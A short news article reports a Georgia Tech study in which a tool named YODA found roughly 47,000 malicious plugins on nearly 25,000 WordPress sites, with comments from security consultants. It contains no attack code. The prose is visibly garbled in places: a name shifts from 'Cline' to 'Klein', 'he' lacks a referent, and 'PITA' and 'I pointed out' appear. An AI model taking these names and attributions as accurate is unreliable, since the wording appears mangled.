A new study by Georgia Tech researchers found malicious plugins installed on nearly 25,000 WordPress websites.
Researchers analyzed over 400,000 web server backups and used a web development tool named ‘YODA’ to find 47,337 malicious plugins on 24,931 unique WordPress sites. All compromised websites in the dataset were found to have two or more infected plugins, with 94% of plugins active.
Researchers were also able to use the YODA tool to trace malware used by WordPress plugins to their source, the George Tech College of Computing reported on August 26th. By exploiting vulnerabilities he injects malware into websites, most often infecting WordPress sites after plugins have been added to WordPress.
In some cases, malicious plugins have been found masquerading as harmless plugins offered through legitimate marketplaces.
Malicious plugins have also been found to spread by attacking other plugins on the server where WordPress is installed. The most common forms of exploitation were cross-plugin infections or infections by exploiting existing vulnerabilities.
Malicious plugins can cause damage, but owners can take steps such as purging malicious plugins and reinstalling malware-free versions that have been scanned for vulnerabilities. .
Cory Cline, senior cybersecurity consultant at application security provider nVisium LLC, told SiliconANGLE: “This is easy because all WordPress plugins are written in PHP and the source code is freely available for review by anyone who wishes.”
Klein added that implementing a WordPress plugin that has not been properly vetted may have no impact if the plugin is non-malicious and does not contain any known vulnerabilities. “However, a malicious WordPress plugin could end up taking over the affected WordPress instance completely,” he said.
According to Sounil Yu, Chief Information Security Officer at JupiterOne Inc., a cyber asset management and governance solutions provider, this is not just a WordPress issue, but any plugin, integration, third-party application, or PITA that leverages it. I pointed out that it was a software problem.
“PITA research is problematic because there are thousands of these PITAs without clear provenance, test results, or data flow diagrams,” Yu explains. “The security team has taken a rudimentary approach, mostly just skimming. And marketplaces need to do more due diligence.”
